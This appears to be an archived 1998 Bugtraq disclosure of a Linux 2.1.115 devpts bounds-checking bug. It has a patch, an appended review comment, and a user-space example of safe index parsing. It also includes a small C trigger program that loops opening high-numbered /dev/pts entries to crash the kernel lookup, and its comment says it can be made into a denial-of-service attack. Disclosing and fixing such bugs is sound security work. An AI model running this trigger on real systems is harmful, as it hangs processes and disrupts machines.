Bugtraq mailing list archives
Linux 2.1.115 oops (demo and fix)
From: dps () IO STARGATE CO UK (Duncan Simpson)
Date: Thu, 13 Aug 1998 19:02:40 +0100
2.1.115 devpts contains a bug that can prevent you from unmounting file systems, and the exploit program sticks in uninterruptible sleep until you reboot. It may be possible to trash kernel data structures using the bug with difficulty. I have yet to both ends of a pty using ptmx and devpts. I assume other versions are vulnerable too.

For purposes of demonstrating the bug, assume devpts is mounted on /dev/pts. My observations suggest the following program should tickle the bug:

/* devpts bug tickler, hits 2.1.115 */
/* WARNING: This program enters uninterruptible sleep when the kernel
 * oopses, so real programmers can turn this into a process table
 * eating DoS attack. */
#include <stdio.h>   /* sprintf */
#include <fcntl.h>   /* open, O_RDWR */

int main(void)
{
    int i, fd;
    char name[256];

    i = 257;   /* first pty number to try */
    while (1) {
        /* Build /dev/pts/<i> and open it; the lookup of the name is
         * what reaches root_lookup in the kernel. */
        sprintf(name, "/dev/pts/%d", i);
        fd = open(name, O_RDWR);
        i++;
    }
}

The bug is a bounds checking failure in the root_lookup function in linux/fs/devpts/root.c. Here is a patch that fixes the bug. Given it is referencing memory it should not be viewing and the bad data is passed back to real_lookup (which promptly oopses), more spectacular effects may be possible. The only way to use a terminal running such a program again is after rebooting, apparently due to the uninterruptible sleep the program that made the system call enters.

--- fs/devpts/root.c.dist Thu Aug 13 17:54:17 1998 +++ fs/devpts/root.c Thu Aug 13 17:56:54 1998 @@ -159,6 +159,8 @@ entry += (*p++ - '0'); } } + if (entry>=sbi->max_ptys) /* Check range of number */ + return 0; dentry->d_inode = sbi->inodes[entry]; if ( dentry->d_inode )
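Review bot: the range check at `if (entry>=sbi->max_ptys)` runs only after the digit loop has finished accumulating into `entry` (`entry += (*p++ - '0');`), so a very long numeric name can overflow `entry` before it is ever compared. The declaration of `entry` is not visible in this hunk; if it is a signed type, a wrapped negative value passes the `>=` test and still reaches `sbi->inodes[entry]`, and if it is unsigned, a wrapped value can alias a valid pty number. Suggest moving the comparison inside the loop so it is applied after each digit, and extending the comment to say what returning 0 before `dentry->d_inode` is set means to the caller.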
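A user-space model of the numeric-name lookup the message describes, with the range check applied after every digit so the array is never indexed with an unchecked value. This is an added example, not code from the original post or from the kernel; `pts_table`, `MAX_PTYS`, `pts_parse_index` and `pts_lookup` are names assumed here, and the table contents are constructed.

```c
#include <stddef.h>
#include <stdio.h>

/* User-space model; pts_table, MAX_PTYS, pts_parse_index and pts_lookup
 * are names assumed for this example, not kernel identifiers. */
#define MAX_PTYS 256
struct pts_table {
    unsigned int max_ptys;
    const char *inodes[MAX_PTYS];   /* stand-in for inode pointers */
};

/* Turn a name such as "12" into an index. Returns 0 on success, -1 if the
 * name is not canonical decimal or is outside [0, max_ptys). */
static int pts_parse_index(const char *name, size_t len,
                           unsigned int max_ptys, unsigned int *out)
{
    unsigned int entry = 0;
    size_t i;

    if (len == 0 || (len > 1 && name[0] == '0'))  /* no "", no "007" */
        return -1;
    for (i = 0; i < len; i++) {
        if (name[i] < '0' || name[i] > '9')
            return -1;
        entry = entry * 10 + (unsigned int)(name[i] - '0');
        /* Checked after every digit, so entry is rejected long before
         * a long digit string could make it wrap. */
        if (entry >= max_ptys)
            return -1;
    }
    *out = entry;
    return 0;
}

/* NULL means "no such entry"; the array is only indexed after the check. */
static const char *pts_lookup(const struct pts_table *t,
                              const char *name, size_t len)
{
    unsigned int idx;
    return pts_parse_index(name, len, t->max_ptys, &idx) ? NULL : t->inodes[idx];
}

int main(void)
{
    static struct pts_table t = { MAX_PTYS, { "pty0", "pty1" } }; /* constructed */
    printf("1 -> %s\n", pts_lookup(&t, "1", 1));
    printf("257 -> %s\n", pts_lookup(&t, "257", 3) ? "found" : "rejected");
    return 0;
}
```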